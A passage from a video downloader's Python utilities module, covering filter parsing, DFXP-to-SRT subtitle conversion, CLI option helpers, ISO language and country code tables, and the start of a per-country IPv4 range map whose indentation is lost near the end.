    if ext in ('m3u8', 'f4m'):
        return ext
    return compat_urllib_parse_urlparse(url).scheme
def render_table(header_row, data, delim=False, extraGap=0, hideEmpty=False):
    """ Render a list of rows, each as a list of values """
    def column_widths(rows):
        # Widest stringified cell per column
        return [max(len(compat_str(cell)) for cell in column) for column in zip(*rows)]

    def prune_columns(row, keep_flags):
        # Keep only cells whose column flag is truthy
        return [cell for keep, cell in zip(keep_flags, row) if keep]

    if hideEmpty:
        # A column whose data cells are all empty has width 0 and is dropped
        widths = column_widths(data)
        header_row = prune_columns(header_row, widths)
        data = [prune_columns(row, widths) for row in data]

    table = [header_row] + data
    widths = column_widths(table)
    if delim:
        # Insert a dashed separator between header and data
        table = [header_row] + [['-' * width for width in widths]] + data
    fmt = ' '.join('%-' + compat_str(width + extraGap) + 's' for width in widths[:-1]) + ' %s'
    return '\n'.join(fmt % tuple(row) for row in table)
def _match_one(filter_part, dct):
    """Evaluate one --match-filter clause against the dict *dct*.

    Supports 'key <op> value' comparisons (a '?' after the operator makes a
    missing field pass) and unary 'key' / '!key' presence tests. Raises
    ValueError for clauses that cannot be parsed or invalid values.
    """
    COMPARISON_OPERATORS = {
        '<': operator.lt,
        '<=': operator.le,
        '>': operator.gt,
        '>=': operator.ge,
        '=': operator.eq,
        '!=': operator.ne,
    }
    # key <op>[?] <number-with-size-suffix | quoted string | bare string>
    operator_rex = re.compile(r'''(?x)\s*
        (?P<key>[a-z_]+)
        \s*(?P<op>%s)(?P<none_inclusive>\s*\?)?\s*
        (?:
            (?P<intval>[0-9.]+(?:[kKmMgGtTpPeEzZyY]i?[Bb]?)?)|
            (?P<quote>["\'])(?P<quotedstrval>(?:\\.|(?!(?P=quote)|\\).)+?)(?P=quote)|
            (?P<strval>(?![0-9.])[a-z0-9A-Z]*)
        )
        \s*$
        ''' % '|'.join(map(re.escape, COMPARISON_OPERATORS.keys())))
    m = operator_rex.search(filter_part)
    if m:
        op = COMPARISON_OPERATORS[m.group('op')]
        actual_value = dct.get(m.group('key'))
        if (m.group('quotedstrval') is not None
                or m.group('strval') is not None
                # If the original field is a string and matching comparisonvalue is
                # a number we should respect the origin of the original field
                # and process comparison value as a string (see
                # https://github.com/ytdl-org/youtube-dl/issues/11082).
                or actual_value is not None and m.group('intval') is not None
                and isinstance(actual_value, compat_str)):
            if m.group('op') not in ('=', '!='):
                raise ValueError(
                    'Operator %s does not support string values!' % m.group('op'))
            comparison_value = m.group('quotedstrval') or m.group('strval') or m.group('intval')
            quote = m.group('quote')
            if quote is not None:
                # Unescape quote characters of the same kind as the delimiters
                comparison_value = comparison_value.replace(r'\%s' % quote, quote)
        else:
            try:
                comparison_value = int(m.group('intval'))
            except ValueError:
                # Not a plain int: try filesize suffixes ('500k', '1.2MiB', ...)
                comparison_value = parse_filesize(m.group('intval'))
                if comparison_value is None:
                    comparison_value = parse_filesize(m.group('intval') + 'B')
                if comparison_value is None:
                    raise ValueError(
                        'Invalid integer value %r in filter part %r' % (
                            m.group('intval'), filter_part))
        if actual_value is None:
            # '<op>?' form: a missing field passes the filter
            return m.group('none_inclusive')
        return op(actual_value, comparison_value)
    UNARY_OPERATORS = {
        '': lambda v: (v is True) if isinstance(v, bool) else (v is not None),
        '!': lambda v: (v is False) if isinstance(v, bool) else (v is None),
    }
    operator_rex = re.compile(r'''(?x)\s*
        (?P<op>%s)\s*(?P<key>[a-z_]+)
        \s*$
        ''' % '|'.join(map(re.escape, UNARY_OPERATORS.keys())))
    m = operator_rex.search(filter_part)
    if m:
        op = UNARY_OPERATORS[m.group('op')]
        actual_value = dct.get(m.group('key'))
        return op(actual_value)
    raise ValueError('Invalid filter part %r' % filter_part)
def match_str(filter_str, dct):
    """ Filter a dictionary with a simple string syntax. Returns True (=passes filter) or false """
    # '&'-separated clauses must all hold
    for filter_part in filter_str.split('&'):
        if not _match_one(filter_part, dct):
            return False
    return True
def match_filter_func(filter_str):
    """Build a match-filter callback: returns None to accept a video, or a
    human-readable skip message otherwise."""
    def _match_func(info_dict):
        if match_str(filter_str, info_dict):
            return None
        video_title = info_dict.get('title', info_dict.get('id', 'video'))
        return '%s does not pass filter %s, skipping ..' % (video_title, filter_str)
    return _match_func
def parse_dfxp_time_expr(time_expr):
    """Parse a TTML/DFXP time expression into seconds (None if unusable)."""
    if not time_expr:
        return None
    # Plain offset, optionally suffixed with 's' (e.g. '10.5s')
    mobj = re.match(r'^(?P<time_offset>\d+(?:\.\d+)?)s?$', time_expr)
    if mobj:
        return float(mobj.group('time_offset'))
    # Clock format HH:MM:SS[.fff] (a ':' before the fraction also occurs)
    mobj = re.match(r'^(\d+):(\d\d):(\d\d(?:(?:\.|:)\d+)?)$', time_expr)
    if mobj:
        hours, minutes, seconds = mobj.groups()
        return 3600 * int(hours) + 60 * int(minutes) + float(seconds.replace(':', '.'))
def srt_subtitles_timecode(seconds):
    """Format a duration in seconds as an SRT timecode (HH:MM:SS,mmm)."""
    hrs = int(seconds / 3600)
    mins = int((seconds % 3600) / 60)
    secs = int(seconds % 60)
    msecs = int((seconds % 1) * 1000)
    return '%02d:%02d:%02d,%03d' % (hrs, mins, secs, msecs)
def dfxp2srt(dfxp_data):
    '''
    @param dfxp_data A bytes-like object containing DFXP data
    @returns A unicode object containing converted SRT data
    '''
    # Legacy TTML namespaces rewritten to their current equivalents before parsing
    LEGACY_NAMESPACES = (
        (b'http://www.w3.org/ns/ttml', [
            b'http://www.w3.org/2004/11/ttaf1',
            b'http://www.w3.org/2006/04/ttaf1',
            b'http://www.w3.org/2006/10/ttaf1',
        ]),
        (b'http://www.w3.org/ns/ttml#styling', [
            b'http://www.w3.org/ns/ttml#style',
        ]),
    )
    # TTML style properties translated into SRT <font>/<b>/<i>/<u> markup
    SUPPORTED_STYLING = [
        'color',
        'fontFamily',
        'fontSize',
        'fontStyle',
        'fontWeight',
        'textDecoration'
    ]
    _x = functools.partial(xpath_with_ns, ns_map={
        'xml': 'http://www.w3.org/XML/1998/namespace',
        'ttml': 'http://www.w3.org/ns/ttml',
        'tts': 'http://www.w3.org/ns/ttml#styling',
    })
    # style id -> resolved property dict (filled by the resolution loop below)
    styles = {}
    # style inherited from body/div, applied under every paragraph's own style
    default_style = {}
    class TTMLPElementParser(object):
        # Accumulated output markup for the current paragraph
        _out = ''
        # NOTE(review): class-level mutable lists are shared between
        # instances; pushes and pops stay balanced per paragraph so this
        # appears harmless in practice — confirm before refactoring
        _unclosed_elements = []
        _applied_styles = []
        def start(self, tag, attrib):
            if tag in (_x('ttml:br'), 'br'):
                self._out += '\n'
            else:
                unclosed_elements = []
                style = {}
                element_style_id = attrib.get('style')
                if default_style:
                    style.update(default_style)
                if element_style_id:
                    style.update(styles.get(element_style_id, {}))
                for prop in SUPPORTED_STYLING:
                    prop_val = attrib.get(_x('tts:' + prop))
                    if prop_val:
                        style[prop] = prop_val
                if style:
                    font = ''
                    for k, v in sorted(style.items()):
                        # Skip properties already in effect from the enclosing element
                        if self._applied_styles and self._applied_styles[-1].get(k) == v:
                            continue
                        if k == 'color':
                            font += ' color="%s"' % v
                        elif k == 'fontSize':
                            font += ' size="%s"' % v
                        elif k == 'fontFamily':
                            font += ' face="%s"' % v
                        elif k == 'fontWeight' and v == 'bold':
                            self._out += '<b>'
                            unclosed_elements.append('b')
                        elif k == 'fontStyle' and v == 'italic':
                            self._out += '<i>'
                            unclosed_elements.append('i')
                        elif k == 'textDecoration' and v == 'underline':
                            self._out += '<u>'
                            unclosed_elements.append('u')
                    if font:
                        self._out += '<font' + font + '>'
                        unclosed_elements.append('font')
                    applied_style = {}
                    if self._applied_styles:
                        applied_style.update(self._applied_styles[-1])
                    applied_style.update(style)
                    self._applied_styles.append(applied_style)
                self._unclosed_elements.append(unclosed_elements)
        def end(self, tag):
            if tag not in (_x('ttml:br'), 'br'):
                # Close the markup opened by the matching start() call
                unclosed_elements = self._unclosed_elements.pop()
                for element in reversed(unclosed_elements):
                    self._out += '</%s>' % element
                if unclosed_elements and self._applied_styles:
                    self._applied_styles.pop()
        def data(self, data):
            self._out += data
        def close(self):
            return self._out.strip()
    def parse_node(node):
        # Serialize the node and re-feed it through TTMLPElementParser to
        # produce SRT-style markup for one paragraph
        target = TTMLPElementParser()
        parser = xml.etree.ElementTree.XMLParser(target=target)
        parser.feed(xml.etree.ElementTree.tostring(node))
        return parser.close()
    for k, v in LEGACY_NAMESPACES:
        for ns in v:
            dfxp_data = dfxp_data.replace(ns, k)
    dfxp = compat_etree_fromstring(dfxp_data)
    out = []
    paras = dfxp.findall(_x('.//ttml:p')) or dfxp.findall('.//p')
    if not paras:
        raise ValueError('Invalid dfxp/TTML subtitle')
    repeat = False
    # Resolve style inheritance; loop again while a parent style is still unknown
    while True:
        for style in dfxp.findall(_x('.//ttml:style')):
            style_id = style.get('id') or style.get(_x('xml:id'))
            if not style_id:
                continue
            parent_style_id = style.get('style')
            if parent_style_id:
                if parent_style_id not in styles:
                    repeat = True
                    continue
                styles[style_id] = styles[parent_style_id].copy()
            for prop in SUPPORTED_STYLING:
                prop_val = style.get(_x('tts:' + prop))
                if prop_val:
                    styles.setdefault(style_id, {})[prop] = prop_val
        if repeat:
            repeat = False
        else:
            break
    # Styles attached to body/div become the default for every paragraph
    for p in ('body', 'div'):
        ele = xpath_element(dfxp, [_x('.//ttml:' + p), './/' + p])
        if ele is None:
            continue
        style = styles.get(ele.get('style'))
        if not style:
            continue
        default_style.update(style)
    for para, index in zip(paras, itertools.count(1)):
        begin_time = parse_dfxp_time_expr(para.attrib.get('begin'))
        end_time = parse_dfxp_time_expr(para.attrib.get('end'))
        dur = parse_dfxp_time_expr(para.attrib.get('dur'))
        if begin_time is None:
            continue
        if not end_time:
            if not dur:
                continue
            # Derive the end timestamp from the explicit duration
            end_time = begin_time + dur
        out.append('%d\n%s --> %s\n%s\n\n' % (
            index,
            srt_subtitles_timecode(begin_time),
            srt_subtitles_timecode(end_time),
            parse_node(para)))
    return ''.join(out)
def cli_option(params, command_option, param):
    """Return [option, value] for a set option, [] when it is unset (None)."""
    value = params.get(param)
    if value:
        # Truthy values are stringified; falsy non-None values pass unchanged
        value = compat_str(value)
    if value is None:
        return []
    return [command_option, value]
def cli_bool_option(params, command_option, param, true_value='true', false_value='false', separator=None):
    """Translate a boolean setting into CLI arguments.

    With a separator the result is a single '--opt<sep>value' token,
    otherwise ['--opt', 'value']. Unset (None) yields [].
    """
    setting = params.get(param)
    if setting is None:
        return []
    assert isinstance(setting, bool)
    rendered = true_value if setting else false_value
    if separator:
        return [command_option + separator + rendered]
    return [command_option, rendered]
def cli_valueless_option(params, command_option, param, expected_value=True):
    """Emit a bare flag when the setting equals the expected value, else []."""
    if params.get(param) == expected_value:
        return [command_option]
    return []
def cli_configuration_args(argdict, keys, default=[], use_compat=True):
    """Resolve extra CLI args from *argdict* for the first matching key group.

    A plain list/tuple argdict is the legacy form: returned as-is when
    use_compat is set, otherwise ignored.
    """
    if isinstance(argdict, (list, tuple)):  # for backward compatibility
        if use_compat:
            return argdict
        argdict = None
    if argdict is None:
        return default
    assert isinstance(argdict, dict)
    assert isinstance(keys, (list, tuple))
    for key_list in keys:
        candidates = [argdict.get(key.lower()) for key in variadic(key_list)]
        matched = [args for args in candidates if args is not None]
        if matched:
            # Flatten all matching argument lists for this key group
            return [arg for args in matched for arg in args]
    return default
class ISO639Utils(object):
    """Conversions between two-letter (ISO 639-1) and three-letter
    (ISO 639-2/T) language codes."""
    # See http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
    _lang_map = {
        'aa': 'aar',
        'ab': 'abk',
        'ae': 'ave',
        'af': 'afr',
        'ak': 'aka',
        'am': 'amh',
        'an': 'arg',
        'ar': 'ara',
        'as': 'asm',
        'av': 'ava',
        'ay': 'aym',
        'az': 'aze',
        'ba': 'bak',
        'be': 'bel',
        'bg': 'bul',
        'bh': 'bih',
        'bi': 'bis',
        'bm': 'bam',
        'bn': 'ben',
        'bo': 'bod',
        'br': 'bre',
        'bs': 'bos',
        'ca': 'cat',
        'ce': 'che',
        'ch': 'cha',
        'co': 'cos',
        'cr': 'cre',
        'cs': 'ces',
        'cu': 'chu',
        'cv': 'chv',
        'cy': 'cym',
        'da': 'dan',
        'de': 'deu',
        'dv': 'div',
        'dz': 'dzo',
        'ee': 'ewe',
        'el': 'ell',
        'en': 'eng',
        'eo': 'epo',
        'es': 'spa',
        'et': 'est',
        'eu': 'eus',
        'fa': 'fas',
        'ff': 'ful',
        'fi': 'fin',
        'fj': 'fij',
        'fo': 'fao',
        'fr': 'fra',
        'fy': 'fry',
        'ga': 'gle',
        'gd': 'gla',
        'gl': 'glg',
        'gn': 'grn',
        'gu': 'guj',
        'gv': 'glv',
        'ha': 'hau',
        'he': 'heb',
        'iw': 'heb',  # Replaced by he in 1989 revision
        'hi': 'hin',
        'ho': 'hmo',
        'hr': 'hrv',
        'ht': 'hat',
        'hu': 'hun',
        'hy': 'hye',
        'hz': 'her',
        'ia': 'ina',
        'id': 'ind',
        'in': 'ind',  # Replaced by id in 1989 revision
        'ie': 'ile',
        'ig': 'ibo',
        'ii': 'iii',
        'ik': 'ipk',
        'io': 'ido',
        'is': 'isl',
        'it': 'ita',
        'iu': 'iku',
        'ja': 'jpn',
        'jv': 'jav',
        'ka': 'kat',
        'kg': 'kon',
        'ki': 'kik',
        'kj': 'kua',
        'kk': 'kaz',
        'kl': 'kal',
        'km': 'khm',
        'kn': 'kan',
        'ko': 'kor',
        'kr': 'kau',
        'ks': 'kas',
        'ku': 'kur',
        'kv': 'kom',
        'kw': 'cor',
        'ky': 'kir',
        'la': 'lat',
        'lb': 'ltz',
        'lg': 'lug',
        'li': 'lim',
        'ln': 'lin',
        'lo': 'lao',
        'lt': 'lit',
        'lu': 'lub',
        'lv': 'lav',
        'mg': 'mlg',
        'mh': 'mah',
        'mi': 'mri',
        'mk': 'mkd',
        'ml': 'mal',
        'mn': 'mon',
        'mr': 'mar',
        'ms': 'msa',
        'mt': 'mlt',
        'my': 'mya',
        'na': 'nau',
        'nb': 'nob',
        'nd': 'nde',
        'ne': 'nep',
        'ng': 'ndo',
        'nl': 'nld',
        'nn': 'nno',
        'no': 'nor',
        'nr': 'nbl',
        'nv': 'nav',
        'ny': 'nya',
        'oc': 'oci',
        'oj': 'oji',
        'om': 'orm',
        'or': 'ori',
        'os': 'oss',
        'pa': 'pan',
        'pi': 'pli',
        'pl': 'pol',
        'ps': 'pus',
        'pt': 'por',
        'qu': 'que',
        'rm': 'roh',
        'rn': 'run',
        'ro': 'ron',
        'ru': 'rus',
        'rw': 'kin',
        'sa': 'san',
        'sc': 'srd',
        'sd': 'snd',
        'se': 'sme',
        'sg': 'sag',
        'si': 'sin',
        'sk': 'slk',
        'sl': 'slv',
        'sm': 'smo',
        'sn': 'sna',
        'so': 'som',
        'sq': 'sqi',
        'sr': 'srp',
        'ss': 'ssw',
        'st': 'sot',
        'su': 'sun',
        'sv': 'swe',
        'sw': 'swa',
        'ta': 'tam',
        'te': 'tel',
        'tg': 'tgk',
        'th': 'tha',
        'ti': 'tir',
        'tk': 'tuk',
        'tl': 'tgl',
        'tn': 'tsn',
        'to': 'ton',
        'tr': 'tur',
        'ts': 'tso',
        'tt': 'tat',
        'tw': 'twi',
        'ty': 'tah',
        'ug': 'uig',
        'uk': 'ukr',
        'ur': 'urd',
        'uz': 'uzb',
        've': 'ven',
        'vi': 'vie',
        'vo': 'vol',
        'wa': 'wln',
        'wo': 'wol',
        'xh': 'xho',
        'yi': 'yid',
        'ji': 'yid',  # Replaced by yi in 1989 revision
        'yo': 'yor',
        'za': 'zha',
        'zh': 'zho',
        'zu': 'zul',
    }
    @classmethod
    def short2long(cls, code):
        """Convert language code from ISO 639-1 to ISO 639-2/T"""
        # Only the first two characters are considered (tolerates e.g. 'en-US')
        return cls._lang_map.get(code[:2])
    @classmethod
    def long2short(cls, code):
        """Convert language code from ISO 639-2/T to ISO 639-1"""
        # Linear reverse lookup; returns None implicitly when unmatched
        for short_name, long_name in cls._lang_map.items():
            if long_name == code:
                return short_name
class ISO3166Utils(object):
    """Lookup of full country names from ISO 3166-1 alpha-2 codes."""
    # From http://data.okfn.org/data/core/country-list
    _country_map = {
        'AF': 'Afghanistan',
        'AX': 'Åland Islands',
        'AL': 'Albania',
        'DZ': 'Algeria',
        'AS': 'American Samoa',
        'AD': 'Andorra',
        'AO': 'Angola',
        'AI': 'Anguilla',
        'AQ': 'Antarctica',
        'AG': 'Antigua and Barbuda',
        'AR': 'Argentina',
        'AM': 'Armenia',
        'AW': 'Aruba',
        'AU': 'Australia',
        'AT': 'Austria',
        'AZ': 'Azerbaijan',
        'BS': 'Bahamas',
        'BH': 'Bahrain',
        'BD': 'Bangladesh',
        'BB': 'Barbados',
        'BY': 'Belarus',
        'BE': 'Belgium',
        'BZ': 'Belize',
        'BJ': 'Benin',
        'BM': 'Bermuda',
        'BT': 'Bhutan',
        'BO': 'Bolivia, Plurinational State of',
        'BQ': 'Bonaire, Sint Eustatius and Saba',
        'BA': 'Bosnia and Herzegovina',
        'BW': 'Botswana',
        'BV': 'Bouvet Island',
        'BR': 'Brazil',
        'IO': 'British Indian Ocean Territory',
        'BN': 'Brunei Darussalam',
        'BG': 'Bulgaria',
        'BF': 'Burkina Faso',
        'BI': 'Burundi',
        'KH': 'Cambodia',
        'CM': 'Cameroon',
        'CA': 'Canada',
        'CV': 'Cape Verde',
        'KY': 'Cayman Islands',
        'CF': 'Central African Republic',
        'TD': 'Chad',
        'CL': 'Chile',
        'CN': 'China',
        'CX': 'Christmas Island',
        'CC': 'Cocos (Keeling) Islands',
        'CO': 'Colombia',
        'KM': 'Comoros',
        'CG': 'Congo',
        'CD': 'Congo, the Democratic Republic of the',
        'CK': 'Cook Islands',
        'CR': 'Costa Rica',
        'CI': 'Côte d\'Ivoire',
        'HR': 'Croatia',
        'CU': 'Cuba',
        'CW': 'Curaçao',
        'CY': 'Cyprus',
        'CZ': 'Czech Republic',
        'DK': 'Denmark',
        'DJ': 'Djibouti',
        'DM': 'Dominica',
        'DO': 'Dominican Republic',
        'EC': 'Ecuador',
        'EG': 'Egypt',
        'SV': 'El Salvador',
        'GQ': 'Equatorial Guinea',
        'ER': 'Eritrea',
        'EE': 'Estonia',
        'ET': 'Ethiopia',
        'FK': 'Falkland Islands (Malvinas)',
        'FO': 'Faroe Islands',
        'FJ': 'Fiji',
        'FI': 'Finland',
        'FR': 'France',
        'GF': 'French Guiana',
        'PF': 'French Polynesia',
        'TF': 'French Southern Territories',
        'GA': 'Gabon',
        'GM': 'Gambia',
        'GE': 'Georgia',
        'DE': 'Germany',
        'GH': 'Ghana',
        'GI': 'Gibraltar',
        'GR': 'Greece',
        'GL': 'Greenland',
        'GD': 'Grenada',
        'GP': 'Guadeloupe',
        'GU': 'Guam',
        'GT': 'Guatemala',
        'GG': 'Guernsey',
        'GN': 'Guinea',
        'GW': 'Guinea-Bissau',
        'GY': 'Guyana',
        'HT': 'Haiti',
        'HM': 'Heard Island and McDonald Islands',
        'VA': 'Holy See (Vatican City State)',
        'HN': 'Honduras',
        'HK': 'Hong Kong',
        'HU': 'Hungary',
        'IS': 'Iceland',
        'IN': 'India',
        'ID': 'Indonesia',
        'IR': 'Iran, Islamic Republic of',
        'IQ': 'Iraq',
        'IE': 'Ireland',
        'IM': 'Isle of Man',
        'IL': 'Israel',
        'IT': 'Italy',
        'JM': 'Jamaica',
        'JP': 'Japan',
        'JE': 'Jersey',
        'JO': 'Jordan',
        'KZ': 'Kazakhstan',
        'KE': 'Kenya',
        'KI': 'Kiribati',
        'KP': 'Korea, Democratic People\'s Republic of',
        'KR': 'Korea, Republic of',
        'KW': 'Kuwait',
        'KG': 'Kyrgyzstan',
        'LA': 'Lao People\'s Democratic Republic',
        'LV': 'Latvia',
        'LB': 'Lebanon',
        'LS': 'Lesotho',
        'LR': 'Liberia',
        'LY': 'Libya',
        'LI': 'Liechtenstein',
        'LT': 'Lithuania',
        'LU': 'Luxembourg',
        'MO': 'Macao',
        'MK': 'Macedonia, the Former Yugoslav Republic of',
        'MG': 'Madagascar',
        'MW': 'Malawi',
        'MY': 'Malaysia',
        'MV': 'Maldives',
        'ML': 'Mali',
        'MT': 'Malta',
        'MH': 'Marshall Islands',
        'MQ': 'Martinique',
        'MR': 'Mauritania',
        'MU': 'Mauritius',
        'YT': 'Mayotte',
        'MX': 'Mexico',
        'FM': 'Micronesia, Federated States of',
        'MD': 'Moldova, Republic of',
        'MC': 'Monaco',
        'MN': 'Mongolia',
        'ME': 'Montenegro',
        'MS': 'Montserrat',
        'MA': 'Morocco',
        'MZ': 'Mozambique',
        'MM': 'Myanmar',
        'NA': 'Namibia',
        'NR': 'Nauru',
        'NP': 'Nepal',
        'NL': 'Netherlands',
        'NC': 'New Caledonia',
        'NZ': 'New Zealand',
        'NI': 'Nicaragua',
        'NE': 'Niger',
        'NG': 'Nigeria',
        'NU': 'Niue',
        'NF': 'Norfolk Island',
        'MP': 'Northern Mariana Islands',
        'NO': 'Norway',
        'OM': 'Oman',
        'PK': 'Pakistan',
        'PW': 'Palau',
        'PS': 'Palestine, State of',
        'PA': 'Panama',
        'PG': 'Papua New Guinea',
        'PY': 'Paraguay',
        'PE': 'Peru',
        'PH': 'Philippines',
        'PN': 'Pitcairn',
        'PL': 'Poland',
        'PT': 'Portugal',
        'PR': 'Puerto Rico',
        'QA': 'Qatar',
        'RE': 'Réunion',
        'RO': 'Romania',
        'RU': 'Russian Federation',
        'RW': 'Rwanda',
        'BL': 'Saint Barthélemy',
        'SH': 'Saint Helena, Ascension and Tristan da Cunha',
        'KN': 'Saint Kitts and Nevis',
        'LC': 'Saint Lucia',
        'MF': 'Saint Martin (French part)',
        'PM': 'Saint Pierre and Miquelon',
        'VC': 'Saint Vincent and the Grenadines',
        'WS': 'Samoa',
        'SM': 'San Marino',
        'ST': 'Sao Tome and Principe',
        'SA': 'Saudi Arabia',
        'SN': 'Senegal',
        'RS': 'Serbia',
        'SC': 'Seychelles',
        'SL': 'Sierra Leone',
        'SG': 'Singapore',
        'SX': 'Sint Maarten (Dutch part)',
        'SK': 'Slovakia',
        'SI': 'Slovenia',
        'SB': 'Solomon Islands',
        'SO': 'Somalia',
        'ZA': 'South Africa',
        'GS': 'South Georgia and the South Sandwich Islands',
        'SS': 'South Sudan',
        'ES': 'Spain',
        'LK': 'Sri Lanka',
        'SD': 'Sudan',
        'SR': 'Suriname',
        'SJ': 'Svalbard and Jan Mayen',
        'SZ': 'Swaziland',
        'SE': 'Sweden',
        'CH': 'Switzerland',
        'SY': 'Syrian Arab Republic',
        'TW': 'Taiwan, Province of China',
        'TJ': 'Tajikistan',
        'TZ': 'Tanzania, United Republic of',
        'TH': 'Thailand',
        'TL': 'Timor-Leste',
        'TG': 'Togo',
        'TK': 'Tokelau',
        'TO': 'Tonga',
        'TT': 'Trinidad and Tobago',
        'TN': 'Tunisia',
        'TR': 'Turkey',
        'TM': 'Turkmenistan',
        'TC': 'Turks and Caicos Islands',
        'TV': 'Tuvalu',
        'UG': 'Uganda',
        'UA': 'Ukraine',
        'AE': 'United Arab Emirates',
        'GB': 'United Kingdom',
        'US': 'United States',
        'UM': 'United States Minor Outlying Islands',
        'UY': 'Uruguay',
        'UZ': 'Uzbekistan',
        'VU': 'Vanuatu',
        'VE': 'Venezuela, Bolivarian Republic of',
        'VN': 'Viet Nam',
        'VG': 'Virgin Islands, British',
        'VI': 'Virgin Islands, U.S.',
        'WF': 'Wallis and Futuna',
        'EH': 'Western Sahara',
        'YE': 'Yemen',
        'ZM': 'Zambia',
        'ZW': 'Zimbabwe',
    }
    @classmethod
    def short2full(cls, code):
        """Convert an ISO 3166-2 country code to the corresponding full name"""
        # Case-insensitive; returns None for unknown codes
        return cls._country_map.get(code.upper())
class GeoUtils(object):
# Major IPv4 address blocks per country
_country_ip_map = {
'AD': '46.172.224.0/19',
'AE': '94.200.0.0/13',
'AF': '149.54.0.0/17',
'AG': '209.59.64.0/18',
'AI': '204.14.248.0/21',
'AL': '46.99.0.0/16',
'AM': '46.70.0.0/15',
'AO': '105.168.0.0/13',
'AP': '182.50.184.0/21',
'AQ': '23.154.160.0/24',
'AR': '181.0.0.0/12',
'AS': '202.70.112.0/20',
'AT': '77.116.0.0/14',
'AU': '1.128.0.0/11',
'AW': '181.41.0.0/18',
'AX': '185.217.4.0/22',
'AZ': '5.197.0.0/16',
'BA': '31.176.128.0/17',
'BB': '65.48.128.0/17',
'BD': '114.130.0.0/16',
'BE': '57.0.0.0/8',
'BF': '102.178.0.0/15',
'BG': '95.42.0.0/15',
'BH': '37.131.0.0/17',
'BI': '154.117.192.0/18',
'BJ': '137.255.0.0/16',
'BL': '185.212.72.0/23',
'BM': '196.12.64.0/18',
'BN': '156.31.0.0/16',
'BO': '161.56.0.0/16',
'BQ': '161.0.80.0/20',
'BR': '191.128.0.0/12',
'BS': '24.51.64.0/18',
'BT': '119.2.96.0/19',
'BW': '168.167.0.0/16',
'BY': '178.120.0.0/13',
'BZ': '179.42.192.0/18',
'CA': '99.224.0.0/11',
'CD': '41.243.0.0/16',
'CF': '197.242.176.0/21',
'CG': '160.113.0.0/16',
'CH': '85.0.0.0/13',
'CI': '102.136.0.0/14',
'CK': '202.65.32.0/19',
'CL': '152.172.0.0/14',
'CM': '102.244.0.0/14',
'CN': '36.128.0.0/10',
'CO': '181.240.0.0/12',
'CR': '201.192.0.0/12',
'CU': '152.206.0.0/15',
'CV': '165.90.96.0/19',
'CW': '190.88.128.0/17',
'CY': '31.153.0.0/16',
'CZ': '88.100.0.0/14',
'DE': '53.0.0.0/8',
'DJ': '197.241.0.0/17',
'DK': '87.48.0.0/12',
'DM': '192.243.48.0/20',
'DO': '152.166.0.0/15',
'DZ': '41.96.0.0/12',
'EC': '186.68.0.0/15',
'EE': '90.190.0.0/15',
'EG': '156.160.0.0/11',
'ER': '196.200.96.0/20',
'ES': '88.0.0.0/11',
'ET': '196.188.0.0/14',
'EU': '2.16.0.0/13',
'FI': '91.152.0.0/13',
'FJ': '144.120.0.0/16',
'FK': '80.73.208.0/21',
'FM': '119.252.112.0/20',
'FO': '88.85.32.0/19',
'FR': '90.0.0.0/9',
'GA': '41.158.0.0/15',
'GB': '25.0.0.0/8',
'GD': '74.122.88.0/21',
'GE': '31.146.0.0/16',
'GF': '161.22.64.0/18',
'GG': '62.68.160.0/19',
'GH': '154.160.0.0/12',
'GI': '95.164.0.0/16',
'GL': '88.83.0.0/19',
'GM': '160.182.0.0/15',
'GN': '197.149.192.0/18',
'GP': '104.250.0.0/19',
'GQ': '105.235.224.0/20',
'GR': '94.64.0.0/13',
'GT': '168.234.0.0/16',
'GU': '168.123.0.0/16',
'GW': '197.214.80.0/20',
'GY': '181.41.64.0/18',
'HK': '113.252.0.0/14',
'HN': '181.210.0.0/16',
'HR': '93.136.0.0/13',
'HT': '148.102.128.0/17',
'HU': '84.0.0.0/14',
'ID': '39.192.0.0/10',
'IE': '87.32.0.0/12',
'IL': '79.176.0.0/13',
'IM': '5.62.80.0/20',
'IN': '117.192.0.0/10',
'IO': '203.83.48.0/21',
'IQ': '37.236.0.0/14',
'IR': '2.176.0.0/12',
'IS': '82.221.0.0/16',
'IT': '79.0.0.0/10',
'JE': '87.244.64.0/18',
'JM': '72.27.0.0/17',
'JO': '176.29.0.0/16',
'JP': '133.0.0.0/8',
'KE': '105.48.0.0/12',
'KG': '158.181.128.0/17',
'KH': '36.37.128.0/17',
'KI': '103.25.140.0/22',
'KM': '197.255.224.0/20',
'KN': '198.167.192.0/19',
'KP': '175.45.176.0/22',
'KR': '175.192.0.0/10',
'KW': '37.36.0.0/14',
'KY': '64.96.0.0/15',
'KZ': '2.72.0.0/13',
'LA': '115.84.64.0/18',
'LB': '178.135.0.0/16',
'LC': '24.92.144.0/20',
'LI': '82.117.0.0/19',
'LK': '112.134.0.0/15',
'LR': '102.183.0.0/16',
'LS': '129.232.0.0/17',
'LT': '78.56.0.0/13',
'LU': '188.42.0.0/16',
'LV': '46.109.0.0/16',
'LY': '41.252.0.0/14',
'MA': '105.128.0.0/11',
'MC': '88.209.64.0/18',
'MD': '37.246.0.0/16',
'ME': '178.175.0.0/17',
'MF': '74.112.232.0/21',
'MG': '154.126.0.0/17',
'MH': '117.103.88.0/21',
'MK': '77.28.0.0/15',
'ML': '154.118.128.0/18',
'MM': '37.111.0.0/17',
'MN': '49.0.128.0/17',
'MO': '60.246.0.0/16',
'MP': '202.88.64.0/20',
'MQ': '109.203.224.0/19',
'MR': '41.188.64.0/18',
'MS': '208.90.112.0/22',
'MT': '46.11.0.0/16',
'MU': '105.16.0.0/12',
'MV': '27.114.128.0/18',
'MW': '102.70.0.0/15',
'MX': '187.192.0.0/11',
'MY': '175.136.0.0/13',
'MZ': '197.218.0.0/15',
'NA': '41.182.0.0/16',
'NC': '101.101.0.0/18',
'NE': '197.214.0.0/18',
'NF': '203.17.240.0/22',
'NG': '105.112.0.0/12',
'NI': '186.76.0.0/15',
'NL': '145.96.0.0/11',
'NO': '84.208.0.0/13',
'NP': '36.252.0.0/15',
'NR': '203.98.224.0/19',
'NU': '49.156.48.0/22',
'NZ': '49.224.0.0/14',
'OM': '5.36.0.0/15',
'PA': '186.72.0.0/15',
'PE': '186.160.0.0/14',
'PF': '123.50.64.0/18',
'PG': '124.240.192.0/19',
'PH': '49.144.0.0/13',
'PK': '39.32.0.0/11',
'PL': '83.0.0.0/11',
'PM': '70.36.0.0/20',
'PR': '66.50.0.0/16',
'PS': '188.161.0.0/16',
'PT': '85.240.0.0/13',
'PW': '202.124.224.0/20',
'PY': '181.120.0.0/14',
'QA': '37.210.0.0/15',
'RE': '102.35.0.0/16',
'RO': '79.112.0.0/13',
